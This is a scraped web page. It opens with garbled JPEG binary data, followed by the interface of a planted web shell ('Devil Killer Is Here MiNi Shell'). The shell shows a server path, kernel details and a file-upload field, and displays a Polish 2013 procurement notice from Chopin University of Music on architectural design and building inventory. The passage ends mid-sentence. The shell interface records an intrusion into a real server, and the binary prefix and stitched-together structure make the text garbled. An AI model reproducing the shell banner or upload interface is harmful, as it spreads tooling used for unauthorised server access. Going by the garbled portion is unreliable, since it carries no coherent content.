JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130327/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130327/121480-N-2013.html

<p class="kh_header"><b>Warszawa: Usługi architektoniczne: część I - Wykonanie projektu budowlano - wykonawczego remontu dachu oraz elewacji od ul. Krakowskie Przedmieście budynku Nowej Dziekanki usytuowanego przy ul. Krakowskie Przedmieście 58/60 w Warszawie; część II - wykonanie inwentaryzacji budowlanej kompleksu budynków DS Dziekanka Uniwersytetu Muzycznego Fryderyka Chopina usytuowanych na działkach przy ul. Krakowskie Przedmieście 56, ul. Krakowskie Przedmieście 58/60, ul. Bednarska 29 i ul. Bednarska 31.</b><br>
<b>Numer ogłoszenia: 121480 - 2013; data zamieszczenia: 27.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Muzyczny Fryderyka Chopina , ul. Okólnik 2, 00-368 Warszawa, woj. mazowieckie, tel. 022 8278309, faks 022 8278309.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chopin.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi architektoniczne: część I - Wykonanie projektu budowlano - wykonawczego remontu dachu oraz elewacji od ul. Krakowskie Przedmieście budynku Nowej Dziekanki usytuowanego przy ul. Krakowskie Przedmieście 58/60 w Warszawie; część II - wykonanie inwentaryzacji budowlanej kompleksu budynków DS Dziekanka Uniwersytetu Muzycznego Fryderyka Chopina usytuowanych na działkach przy ul. Krakowskie Przedmieście 56, ul. Krakowskie Przedmieście 58/60, ul. Bednarska 29 i ul. Bednarska 31..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W zakresie części I zamówienia: Zakres prac projektowych: - ekspertyza stanu technicznego dachu i elewacji wraz z wnioskami i wytycznymi do remontu - remont dachu ze szczególnym uwzględnieniem prawidłowego odprowadzenia wód opadowych wraz z instalacją do podgrzewania rynien i rur spustowych oraz instalacją odgromową (również w zakresie instalacji elektrycznych) z uzyskaniem niezbędnych uzgodnień rzeczoznawców - remont elewacji z uwzględnieniem wszystkich instalacji znajdujących się na elewacji budynku - informację dotyczącą bezpieczeństwa i ochrony zdrowia - specyfikacje techniczne ogólne i szczegółowe wykonania i odbioru robót budowlanych objętych przedmiotem zamówienia, opracowane zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej , specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 z późn. zm.). - przedmiary robót obejmujące przedmiot zamówienia i uwzględniające wszystkie niezbędne czynności wynikające z konieczności zabezpieczenia prac oraz innych czynności nie wynikających bezpośrednio z dokumentacji technicznej w zakresie określonym w przedmiocie zamówienia np. ustawienie rusztowań; - kosztorysy inwestorskie sporządzone na podstawie wykonanych przedmiarów, spełniające wymogi zawarte w rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389); Ponadto pełnienie nadzoru autorskiego nad realizowanymi robotami budowlanymi na podstawie przygotowanego przez Wykonawcę projektu. Szczegółowy opis przedmiotu zamówienia stanowi załącznik do Specyfikacji Istotnych Warunków Zamówienia. 

W zakresie części II zamówienia: inwentaryzacja budynków powinna zawierać: - Opis techniczny z uwzględnieniem lokalizacji, rodzaju i charakteru budynku, liczby kondygnacji, jego wysokości i powierzchni, uzbrojenia budynków w instalacje - Opis materiałów budowlanych, z jakich wykonane zostały poszczególne elementy budynku - Plan sytuacyjny z naniesionymi budynkami - Zwymiarowane rzuty wszystkich kondygnacji zarówno naziemnych, jak i podziemnych (z określeniem materiału wykończeniowego posadzek) oraz inwentaryzację przewodów wentylacyjnych, spalinowych i dymowych w skali 1:50 - Rzut więźby dachowej i dachu z przewodami kominowymi i wentylacyjnymi oraz sposobem odwodnienia 1:50 - Przekroje przez wszystkie kondygnacje z zaznaczonymi wysokościami charakterystycznych punktów (rzędne posadzek, parapetów, podestów klatek schodowych, tarasów, dachów i kominów, gzymsów i terenu przy budynku) - Elewacje budynków Do opracowania należy dołączyć zestawienie powierzchni użytkowych dla poszczególnych budynków. Opracowanie powinno być sporządzone zgodnie z obowiązującymi przepisami w tym zakresie. Dokumentacja musi być zgodna z przepisami techniczno-budowlanymi, Polskimi Normami i zasadami wiedzy technicznej. Szczegółowy opis przedmiotu zamówienia stanowi załącznik do Specyfikacji Istotnych Warunków Zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.24.80.00-8, 71.25.00.00-5, 71.25.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium w przedmiotowym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje niniejszego warunku. Ocena spełniania warunku dokonana zostanie na podstawie złożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu (zgodnie ze wzorem zamieszczonym w załączniku nr 1 do ogłoszenia zamieszczonego na stronie internetowej Zamawiającego www.chopin.edu.pl)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania powyższego warunku Wykonawca musi wykazać:
W zakresie części I (pierwszej) zamówienia, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a przypadku świadczeń ciągłych lub okresowych wykonuje, przynajmniej 2 (dwa) zamówienia o wartości co najmniej 40.000 zł brutto (w przypadku wartości wyrażonej w walucie innej niż PLN - równowartość 40.000 zł brutto wg średniego kursu NBP z daty zawarcia umowy), których przedmiotem było opracowanie dokumentacji projektowej remontu (renowacji) elewacji i dachu (w każdym zamówieniu) budynków znajdujących się w strefie podlegającej ochronie konserwatora zabytków. Jeżeli liczba Wykonawców, którzy spełniać będą warunki udziału w postępowaniu będzie większa niż określona w dalszej części ogłoszenia - (5) pięciu w zakresie przedmiotowej części zamówienia - Zamawiający zaprosi do składania ofert Wykonawców, którzy wykażą największą liczbę zamówień polegających na opracowaniu dokumentacji projektowej remontu (renowacji) elewacji i dachu (w każdym zamówieniu) budynków znajdujących się w strefie podlegającej ochronie konserwatora zabytków.
W przypadku, gdy dwóch lub więcej Wykonawców potwierdzi spełnianie warunków udziału w postępowaniu na tym samy poziomie o miejscu w klasyfikacji będzie decydować suma brutto (w zł) wszystkich wykazanych zamówień dotyczących opracowania dokumentacji projektowej remontu (renowacji) elewacji i dachu (w każdym zamówieniu) budynków znajdujących się w strefie podlegającej ochronie konserwatora zabytków.
W zakresie części II (drugiej) zamówienia, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń ciągłych lub okresowych wykonuje przynajmniej 2 zamówienia o wartości co najmniej 30.000 zł brutto (w przypadku wartości wyrażonej w walucie innej niż PLN - równowartość 30.000 zł brutto wg średniego kursu NBP z daty zawarcia umowy), których przedmiotem było wykonanie inwentaryzacji budowlanej budynków zabytkowych (wpisanych do ewidencji zabytków) o powierzchni co najmniej 5000m2 (każde zamówienie). Jeżeli liczba Wykonawców, którzy spełniać będą warunki udziału w postępowaniu będzie większa niż określona w dalszej części ogłoszenia (5) pięciu w zakresie przedmiotowej części zamówienia - Zamawiający zaprosi do składania ofert Wykonawców, którzy wykażą największą liczbę zamówień polegających na wykonaniu inwentaryzacji budynków zabytkowych (wpisanych do ewidencji zabytków) o powierzchni co najmniej 5000m2 (każde zamówienie).
W przypadku, gdy dwóch lub więcej Wykonawców potwierdzi spełnianie warunków udziału w postępowaniu na tym samy poziomie o miejscu w klasyfikacji będzie decydować suma brutto (w zł) wszystkich wykazanych zamówień dotyczących wykonania inwentaryzacji budowlanej budynków zabytkowych (wpisanych do ewidencji zabytków) o powierzchni co najmniej 5000m2 (każde zamówienie).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje niniejszego warunku. Ocena spełniania warunku dokonana zostanie na podstawie złożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu (zgodnie ze wzorem zamieszczonym w załączniku nr 1 do ogłoszenia zamieszczonego na stronie internetowej Zamawiającego www.chopin.edu.pl)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje lub w trakcie realizacji zamówienia będzie dysponował:
W zakresie części I (pierwszej) zamówienia: przynajmniej trzema (3) osobami posiadającymi uprawnienia do projektowania w branżach:
-jedna (1) osoba - konstrukcyjnej bez ograniczeń, posiadająca doświadczenie w projektowaniu remontów (renowacji) dachów i elewacji co najmniej trzech budynków, w tym dwóch budynków znajdujących się w strefie podlegającej ochronie konserwatora zabytków,
- jedna (1) osoba - architektonicznej posiadająca doświadczenie w projektowaniu remontów (renowacji) dachów i elewacji co najmniej trzech budynków, w tym dwóch budynków znajdujących się w strefie podlegającej ochronie konserwatora zabytków,
- jedna (1) osoba - elektrycznej posiadająca doświadczenie w projektowaniu instalacji elektrycznych w co najmniej trzech budynkach.
Należy potwierdzić, iż wszystkie wskazane osoby, wg powyższego wykazu posiadają aktualne członkostwo we właściwej izbie samorządu zawodowego.
W zakresie części II (zamówienia) zamówienia: przynajmniej jedną (1) osobą posiadającą uprawnienia do projektowania w branży konstrukcyjnej lub architektonicznej posiadającą doświadczenie realizacji usług, których przedmiotem było wykonanie inwentaryzacji budowlanej budynków zabytkowych (wpisanych do ewidencji zabytków) o powierzchni co najmniej 5000m2 (każde zamówienie).
Należy potwierdzić, iż wskazana osoba, wg powyższego wykazu posiada aktualne członkostwo we właściwej izbie samorządu zawodowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje niniejszego warunku. Ocena spełniania warunku dokonana zostanie na podstawie złożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu (zgodnie ze wzorem zamieszczonym w załączniku nr 1 do ogłoszenia zamieszczonego na stronie internetowej Zamawiającego www.chopin.edu.pl)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Stosownie do dyspozycji zawartej w §  1 ust. 4 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz. U. 2013 r., poz. 231) Zamawiający wymaga uwzględnienia w wykazie co najmniej usług określonych w pkt III.3.2) niniejszego ogłoszenia, załączając jednocześnie dowody potwierdzające czy zostały one wykonane lub są wykonywane należycie. Wzór wykazu stanowi Załącznik nr 3 do Ogłoszenia (do pobrania ze strony internetowej zamawiającego www.chopin.edu.pl). Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia dokument ten składa przynajmniej jeden z nich.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>W zakresie części I (pierwszej) zamówienia: Jeżeli liczba Wykonawców, którzy spełniać będą warunki udziału w postępowaniu będzie większa niż (5) pięciu w zakresie przedmiotowej części zamówienia - Zamawiający zaprosi do składania ofert Wykonawców, którzy wykażą największą liczbę zamówień polegających na opracowaniu dokumentacji projektowej remontu (renowacji) elewacji i dachu (w każdym zamówieniu) budynków znajdujących się w strefie podlegającej ochronie konserwatora zabytków.
W przypadku, gdy dwóch lub więcej Wykonawców potwierdzi spełnianie warunków udziału w postępowaniu na tym samy poziomie o miejscu w klasyfikacji będzie decydować suma brutto (w zł) wszystkich wykazanych zamówień dotyczących opracowania dokumentacji projektowej remontu (renowacji) elewacji i dachu (w każdym zamówieniu) budynków znajdujących się w strefie podlegającej ochronie konserwatora zabytków.
W zakresie części II (drugiej) zamówienia: Jeżeli liczba Wykonawców, którzy spełniać będą warunki udziału w postępowaniu będzie większa niż (5) pięciu w zakresie przedmiotowej części zamówienia - Zamawiający zaprosi do składania ofert Wykonawców, którzy wykażą największą liczbę zamówień polegających na wykonaniu inwentaryzacji budowlanej budynków zabytkowych (wpisanych do ewidencji zabytków) o powierzchni co najmniej 5000m2 (każde zamówienie).
W przypadku, gdy dwóch lub więcej Wykonawców potwierdzi spełnianie warunków udziału w postępowaniu na tym samy poziomie o miejscu w klasyfikacji będzie decydować suma brutto (w zł) wszystkich wykazanych zamówień dotyczących wykonania inwentaryzacji budowlanej budynków zabytkowych (wpisanych do ewidencji zabytków) o powierzchni co najmniej 5000m2 (każde zamówienie).</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian treści zawartej umowy w następujących okolicznościach:
1) nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu Zamówienia, w szczególności w zakresie wysokości stawki podatku od towarów i usług (VAT), a co za tym idzie zmianą wysokości wynagrodzenia brutto, o którym mowa w §3 Umowy;
2) nastąpi zmiana okoliczności faktycznych lub prawnych po stronie ZAMAWIAJACEGO skutkująca zmianą wysokości stawki podatku od towarów i usług (VAT), a co za tym idzie zmianą wysokości wynagrodzenia brutto, zawartego w umowie;
3) konieczna okaże się zmiana, która będzie następstwem zmian wprowadzonych w umowach pomiędzy ZAMAWIAJĄCYM a inną niż WYKONAWCA stroną, w ramach której realizowane jest zamówienie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Stanowisko ds. zamówień publicznych - Uniwersytet Muzyczny Fryderyka Chopina - ul. Okólnik 2 w Warszawie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2013 godzina 15:00, miejsce: Uniwersytet Muzyczny Fryderyka Chopina - ul. Okólnik 2 w Warszawie - kancelaria - pok. 213a.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający na swojej stronie internetowej www.chopin.edu.pl zamieszcza załączniki do przedmiotowego ogłoszenia o zamówieniu w celu ułatwienia Wykonawcom przygotowania do złożenia wniosków o udzielenie przedmiotowego zamówienia:
Załącznik nr 1 wzór oświadczenia o spełnianiu warunków udziału w postępowaniu;
Załącznik nr 2 wzór oświadczenia o braku podstaw do wykluczenia;
Załącznik nr 3 wzór wykazu wykonanych zamówień;
Załącznik nr 4 wzór wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia;
Załącznik nr 5 wzór informacji albo listy podmiotów należących do tej samej grupy kapitałowej;
Załącznik nr 6 wzór wniosku o dopuszczenie do udziału w postępowaniu.
Terminy określone w załączniku nr I (części zamówienia) - jako 60 dni dla części I zamówienia oraz jako 90 dni dla części II zamówienia są terminami maksymalnymi od udzielenia zamówienia, ponieważ termin wykonania zamówienia stanowi kryterium oceny ofert dla obu części zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie projektu budowlano - wykonawczego remontu dachu oraz elewacji od ul. Krakowskie Przedmieście budynku Nowej Dziekanki usytuowanego przy ul. Krakowskie Przedmieście 58/60 w Warszawie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie części I zamówienia: Zakres prac projektowych: - ekspertyza stanu technicznego dachu i elewacji wraz z wnioskami i wytycznymi do remontu - remont dachu ze szczególnym uwzględnieniem prawidłowego odprowadzenia wód opadowych wraz z instalacją do podgrzewania rynien i rur spustowych oraz instalacją odgromową (również w zakresie instalacji elektrycznych) z uzyskaniem niezbędnych uzgodnień rzeczoznawców - remont elewacji z uwzględnieniem wszystkich instalacji znajdujących się na elewacji budynku - informację dotyczącą bezpieczeństwa i ochrony zdrowia - specyfikacje techniczne ogólne i szczegółowe wykonania i odbioru robót budowlanych objętych przedmiotem zamówienia, opracowane zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej , specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 z późn. zm.). - przedmiary robót obejmujące przedmiot zamówienia i uwzględniające wszystkie niezbędne czynności wynikające z konieczności zabezpieczenia prac oraz innych czynności nie wynikających bezpośrednio z dokumentacji technicznej w zakresie określonym w przedmiocie zamówienia np. ustawienie rusztowań; - kosztorysy inwestorskie sporządzone na podstawie wykonanych 